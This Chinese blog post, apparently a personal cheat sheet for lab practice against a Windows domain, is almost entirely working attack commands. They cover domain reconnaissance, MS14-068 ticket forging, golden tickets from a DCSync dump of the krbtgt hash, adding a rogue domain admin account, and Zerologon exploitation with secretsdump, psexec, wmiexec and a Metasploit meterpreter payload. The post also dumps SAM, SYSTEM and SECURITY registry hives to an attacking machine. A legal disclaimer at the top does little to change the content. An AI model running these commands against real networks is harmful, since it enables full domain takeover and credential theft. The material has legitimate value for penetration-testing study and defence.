内网横向打靶

2021-10-29  本文已影响0人  migrate_

遵纪守法

任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益

信息收集

wmic product get name,version
wmic process list brief
whoami /all
或者
wmic useraccount get Caption,sid
net user 用户名 /domain
ipconfig /all
或者
systeminfo
知道域控xxx.com 定位域控ip
nslookup xxx.com
net config workstation
net time /domain
for /l %i in (1,1,255) do @ping 192.168.64.%i -w 1 -n 1|find /i "ttl="
for k in $(seq 1 255);do ping -c 1 192.168.99.$k|grep "ttl"|awk -F "[:]+" '{print $4}'; done
net view /domain
net view /domain:xxx
net user /domain
net group /domain
net group "domain admins" /domain 
net group "domain controllers" /domain 
nltest /domain_trusts
返回所有信任192.168.117.3域的所有域:
nltest /domain_trusts /all_trusts /v /server:192.168.117.3
nltest /dsgetdc:域名 
nltest /dsgetdc:whoamianony.org
nltest /dclist:whoamianony.org
net time /domain 得到域名 xx.com
nslookup xx.com  得到域控ip
或者
nslookup -type=SRV _ldap._tcp
或者
使用管理员权限运行cmd
netdom query dc  查看所有dc域控制器
你再使用ping 控制器名称就能获取到dc的ip了
ping DC
用户名:Administrator 运行cmd程序
温馨提示:若有密码则输入密码,输入密码时不可见密码。
runas /noprofile /user:Administrator cmd

MS14-068域提权漏洞

systeminfo |find "3011780"
使用 whoami/user 得到普通域用户的sid
ms14-068 -u venus@venus.com -s sid -d 192.168.63.137(域控) -p admin@123  生成一个票据 TGT_cache文件
例子:
ms14-068.exe -u moretz@whoamianony.org -s S-1-5-21-1315137663-3706837544-1429009142-1115 -d 192.168.93.30 -p Moretz2021
kerberos::list
kerberos::purge
kerberos::ptc c:\TGT_cache票据文件 //将票据注入到内存中
net use \\DC.whoamianony.org
dir \\DC.whoamianony.org\c$
psexec.exe \\DC.whoamianony.org cmd.exe

黄金票据

伪造金票的所需条件
提升权限
privilege::debug
导出域内所有用户的账号密码
lsadump::dcsync /domain:test.com /all /csv
找到krbtgt的hash
lsadump::dcsync /domain:test.com /user:krbtgt
生成黄金票据
kerberos::golden /admin:Administrator /domain:venus.com /sid:域的sid(不带后缀的数字) /krbtgt:这个用户的hash /ticket:Administrator.kirbi(票据的名字)
例子:
kerberos::golden /user:Administrator /domain:test.com /sid:S-1-5-21-3763276348-88739081-2848684050 /krbtgt:d8d2ad72a119a8d418703f7a16580af6 /ticket:1.kirbi
执行结束后,会在运行目录生成一个1.kirbi的文件
清除票据
kerberos::purge
然后注入票据
kerberos::ptt Administrator.kirbi
查看票据是否成功
kerberos::tgt

遇到的一些坑

net user aaa Qwe123... /add /domain
net group "Domain Admins" aaa /add /domain

CVE-2020-1472 (NetLogon特权提升漏洞)

impacket安装:
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
python3 setup.py install
(如果事先安装了impacket可使用pip3 uninstall impacket命令卸载)
python3 zerologon_tester.py dc 192.168.93.30
Success! DC can be fully compromised by a Zerologon attack 出现这个就说明存在漏洞
python3 set_empty_pw.py DC 192.168.93.30
python3 secretsdump.py WHOAMIANONY.ORG/DC\$@192.168.93.30 -just-dc -no-pass
use exploit/windows/smb/psexec
set SMBUser administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:ab89b1295e69d353dd7614c7a3a80cec
set payload windows/meterpreter/bind_tcp
set rhost 192.168.93.30
run/exploit

或者

python3 secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 WHOAMIANONY.ORG/DC\$@192.168.93.30
python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:ab89b1295e69d353dd7614c7a3a80cec whoamianony/administrator@192.168.93.30

还原hash

生成
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
-----------------
下载到Kali中
get system.save
get sam.save
get security.save
-----------------
下载完成之后进行删除
del /f system.save
del /f sam.save
del /f security.save
python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
1 (2).png
python3 reinstall_original_pw.py DC 192.168.93.30 7fd0cca5eafe480f617b04039bbf115c
python3 secretsdump.py WHOAMIANONY.ORG/DC\$@192.168.93.30 -just-dc -no-pass

重点

一定要恢复域控hash,不然会导致脱域
上一篇 下一篇

猜你喜欢

热点阅读